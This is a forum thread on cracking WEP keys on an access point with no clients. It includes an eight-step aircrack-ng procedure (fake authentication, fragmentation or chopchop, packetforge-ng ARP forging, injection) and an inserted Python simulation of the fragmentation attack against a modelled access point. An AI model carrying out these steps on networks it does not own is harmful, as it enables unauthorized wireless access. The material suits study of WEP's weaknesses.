Page 1 of 2
Results 1 to 10 of 15

Thread: WEP: no data packets, please explain

  1. #1
    Just burned his ISO
    Join Date
    Oct 2006
    Posts
    3

    Default WEP: no data packets, please explain

    Alright, after reading and testing many tutorials/videos over cracking WEP with no clients, I need some explanation on something.

    I noticed that almost all guides/tuts have one pre-req. It requires that you have Data packets on the network.
    Example:
    Code:
    Req: There are some data packets coming from the access point. Beacons and other management frame packets are totally useless for our purposes in this tutorial. A quick way to check is to run airodump-ng and see if there are any data packets counted for the access point. Having said that, if you have data captured from the access point from another session, then this can be used. This is an advanced topic and this tutorial does not provide detailed instructions for this case.
    If there are no clients, then how are data packets generated. It seems like all 3 methods for cracking WEP (aireplay -3, -4, -5) require some sort of data collection other than the stuff the AP generates. Is this assuming that there are clients on the wired side that could generate traffic?

    If not, is it possible to crack a COMPLETELY clientless AP? By clientless, I mean nothing connected to the wired and wireless side.

    Any information or resources would be helpful.

  2. #2
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    yes
    you need to wait....that is the secret...patience...an arp will be released...can take 1 min to forever....

    have you seen our videos tuts by exploitz.....on the forum....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  3. #3
    Just burned his ISO
    Join Date
    Oct 2006
    Posts
    3

    Default

    Thx for the reply shamanvirtuel.

I was kind of looking for a more detailed response than just patience. I know ARP (Address Resolution Protocol) is used to determine addresses (MAC addresses in this case) for clients; maybe it's my lack of knowledge of ARP, but how does an ARP packet get generated on a network without any clients?

    Basically, I'm looking for a scenario when an AP with no wireless clients and no wired connection would generate anything usable for a WEP attack.

  4. #4
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    Quote Originally Posted by ritalinkid View Post
    Basically, I'm looking for a scenario when an AP with no wireless clients and no wired connection would generate anything usable for a WEP attack.
    This would be a good start for you.

    Just as the tut explains:

    * 1 - Set the wireless card MAC address
    * 2 - Start the wireless interface in monitor mode on the specific AP channel
    * 3 - Use aireplay-ng to do a fake authentication with the access point
    * 4 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA
    * 5 - Use packetforge-ng to create an arp packet using the PRGA obtained in the previous step
    * 6 - Start airodump-ng on AP channel with filter for bssid to collect the new unique IVs
    * 7 - Inject the arp packet created in step 5
    * 8 - Run aircrack-ng to crack key using the IVs collected

    I have done this many times successfully on my AP
    dd if=/dev/swc666 of=/dev/wyze

  5. #5
    Junior Member imported_seven's Avatar
    Join Date
    May 2007
    Posts
    97

    Default

When cracking an AP with no wireless clients, you should fake authenticate. Boom, now you have a client. But don't de-auth yourself to generate ARP. Use chopchop or fragmentation and then forge your own packet. I feel forging your own is the best way possible for any situation. After you forge it, inject your nice new ARP packet with ARP replay (-2).

    Good luck.

  6. #6
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    WEP: no data packets, explained

    Please keep titles descriptive of the problem, the way you wrote the title before I edited it was saying that you had a solution and not that you wanted a solution.
    This is borderline spamming, and next time will be treated as such.

  7. #7
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by ritalinkid View Post
    I was kind of looking for a more detailed response then just patience.
    Patience IS the answer. There is *nothing* you can do except wait for a data packet. If you're testing your own network, and you don't want to wait, ping a non-existent IP.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  8. #8
    Member
    Join Date
    May 2007
    Posts
    138

    Default

    So, just out of interest, an AP with nothing attached will eventually send an ARP regardless?

I'll give it a try and see at some point, but I have to share my AP with my housemates and I'm not sure they'd be happy with me disconnecting the internet entirely to conduct my experiments.

  9. #9
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by TrialAndError View Post
    So, just out of interest, an AP with nothing attached will eventually send an ARP regardless?

    I'll give it a try and see at some point, but I have to share my AP with my housemates and I'm not sure they'd be happy with me disconnecting the internet entirely to conduct my experiments.
    Not necessarily. You only need one "data" packet with the fragmentation or chopchop attack, which helps you obtain some keystream data. These attacks reinject arbitrary but known data to collect more keystream data. Then you can use packetforge to create an ARP packet for injection.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";
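The eight-step procedure in post #4 and the keystream explanation in post #9 are the same thing seen from two sides, so here is one runnable model of it. This is an added example, not code from the thread or from the aircrack-ng suite: a toy WEP frame format (3-byte IV || RC4-encrypted payload || CRC-32 ICV, no 802.11 header or key-index byte), a constructed access point that decrypts fragments, reassembles them and relays the result under a fresh IV, and constructed key, IV and MAC/IP values. It walks the "one data packet" step (XOR the captured ciphertext with the predictable LLC/SNAP header to get 8 bytes of PRGA), the fragmentation step (send that known data in 4-byte fragments and XOR the AP's relayed reassembly to get a long keystream), the packetforge-ng step (encrypt a forged ARP request with the keystream, never the key) and the aireplay-ng -2 step (replay it to harvest unique IVs).

```python
"""Toy WEP model: why one data frame is enough on a clientless AP.
Added example, not the thread's or aircrack-ng's code; AP model and all
key/IV/address values are constructed for illustration."""
import struct
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # predictable first 8 bytes of any ARP frame


def rc4(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream (the PRGA) for key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    body = data + icv(data)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext, or None when the ICV fails (the AP drops such frames)."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    data = plain[:-4]
    return data if plain[-4:] == icv(data) else None


def encrypt_with_keystream(iv: bytes, ks: bytes, data: bytes) -> bytes:
    """Encrypt without the key, using a known PRGA for this IV (the packetforge-ng idea)."""
    body = data + icv(data)
    assert len(body) <= len(ks), "not enough keystream for this frame"
    return iv + xor(body, ks)


class AccessPoint:
    """Constructed AP: decrypts fragments, reassembles them, relays under a fresh IV."""
    def __init__(self, key: bytes):
        self.key = key
        self.counter = 0x0A0000  # constructed IV counter

    def relay(self, fragments):
        parts = []
        for frag in fragments:
            data = wep_decrypt(self.key, frag)
            if data is None:
                return None
            parts.append(data)
        self.counter += 1
        return wep_encrypt(self.key, self.counter.to_bytes(3, "big"), b"".join(parts))


def keystream_from_capture(frame: bytes, known_plaintext: bytes = LLC_SNAP_ARP):
    """The 'one data packet' step: ciphertext XOR known plaintext = keystream for that IV."""
    return frame[:3], xor(frame[3:3 + len(known_plaintext)], known_plaintext)


def fragmentation_attack(ap: AccessPoint, iv: bytes, ks: bytes, target: int, max_frags: int = 16):
    """Grow a short keystream: each fragment carries len(ks)-4 bytes of attacker-chosen data
    plus its 4-byte ICV; the AP relays the reassembled frame, which we XOR with what we sent."""
    while len(ks) < target:
        chunk = len(ks) - 4
        payload = bytes((7 * i + 3) & 0xFF for i in range(chunk * max_frags))  # constructed filler
        frags = [encrypt_with_keystream(iv, ks, payload[i:i + chunk])
                 for i in range(0, len(payload), chunk)]
        relayed = ap.relay(frags)
        iv, ks = keystream_from_capture(relayed, payload + icv(payload))
    return iv, ks[:target]


def build_arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + ARP who-has (RFC 826) with a zero target MAC, as packetforge-ng -0 builds."""
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1) + sender_mac + sender_ip + b"\x00" * 6 + target_ip
    return LLC_SNAP_ARP + arp


def clientless_attack(key: bytes, captured: bytes, replays: int = 50):
    """Steps 4-7 of the thread against the toy AP; the key is only used to play the AP.
    Returns (forged frame passes the AP's ICV check, number of unique IVs harvested)."""
    ap = AccessPoint(key)
    iv, ks = keystream_from_capture(captured)                      # 8 bytes of PRGA
    iv, ks = fragmentation_attack(ap, iv, ks, target=64)           # enough for an ARP frame
    arp = build_arp_request(bytes.fromhex("00c0ca123456"),
                            bytes([192, 168, 1, 2]), bytes([192, 168, 1, 1]))
    forged = encrypt_with_keystream(iv, ks, arp)                   # the 'arp-request' file
    accepted = wep_decrypt(key, forged) == arp
    harvested = {ap.relay([forged])[:3] for _ in range(replays)}   # aireplay-ng -2 loop
    return accepted, len(harvested)


if __name__ == "__main__":
    KEY = bytes.fromhex("0102030405")                               # constructed 40-bit key
    one_frame = wep_encrypt(KEY, b"\x11\x22\x33", LLC_SNAP_ARP + b"\x00" * 28)
    print(clientless_attack(KEY, one_frame))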

  10. #10
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    FYI, I just ran the fragmentation attack against my AP, with no clients connected. It took 194 packets to get a usable 'data' packet, and it worked in obtaining the PRGA to create the ARP packet via packetforge.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

